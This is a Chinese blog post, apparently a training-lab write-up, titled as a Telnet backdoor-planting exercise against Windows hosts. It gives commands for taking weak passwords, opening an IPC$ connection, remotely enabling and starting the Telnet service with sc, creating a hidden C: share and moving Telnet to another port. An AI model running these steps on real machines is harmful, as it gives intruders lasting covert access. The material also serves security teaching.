系统后门种植实验-TELNET

系统后门种植实验-TELNET

 

实验目的

1、掌握Telnet服务的原理;

2、掌握Telnet服务的工作过程。

实验步骤一

本地开启Telnet服务

 进入主机A,右键“我的电脑”->管理->服务和应用程序->服务,找到Telnet服务,双击,将启动类型改为“手动”

实验步骤二

远程开启Telnet服务

(1)首先用流光嗅探等工具探得到对方密码,主要是弱口令。

(2)在主机B的“控制面板-工具-文件夹选项-查看-简单的文件共享”去掉选取。

(3)右键“我的电脑”->管理->服务和应用程序->服务,找到Telnet服务,关闭之:

 (4)回到主机A用net use命令建立ipc$连接

(5)用sc命令把禁用的telnet服务变成自动

 

本地开启Telnet服务

进入主机A,右键“我的电脑”->管理->服务和应用程序->服务,找到Telnet服务,如图所示:

 

 双击,将启动类型改为“手动”

 

 

 

实验步骤二

远程开启Telnet服务

(1)首先用流光嗅探等工具探得到对方密码,主要是弱口令(此步可跳过,用已知的实验机用户名密码进行试验)。

(2)在主机B的“控制面板-工具-文件夹选项-查看-简单的文件共享”去掉选取。

 

 (3)右键“我的电脑”->管理->服务和应用程序->服务,找到Telnet服务,关闭之:

(4)回到主机A用net use命令建立ipc$连接(主机用户名密码可在实验环境右侧“切换”鼠标悬浮时看到)

命令:net use \10.1.1.119ipc$ “主机B的密码” /user:administrator

(5)用sc命令把禁用的telnet服务变成自动

命令:sc \10.1.1.119 config tlntsvr start= auto

 

 

 (6)在主机B上可以查看telnet的启动类型已经变为自动:

(7)sc命令将telnet启动

命令:sc \10.1.1.119 start tlntsvr

在主机B上可以查看telnet服务已经启动:

 

 

 (8)新建一个cmd环境进行telnet登录:telnet 10.1.1.119

 

 telnet连接建立之后,可输入用户名密码等相关信息进行登录,telnet服务登录到远程主机:

 

 

(9)登录后便可进行共享等相关操作,net share建立c$共享

命令:net share abc$=c:

 

 查看共享目录:net shar

 

 

 

(10)远程更改telnet端口

输入tlntadmn \10.1.1.119 config port=1000 -u administrator -p 主机B的密码

 

答题

 

 

 

posted @ 2021-10-17 23:11  ChihiroLRD  阅读(35)  评论(0编辑  收藏  举报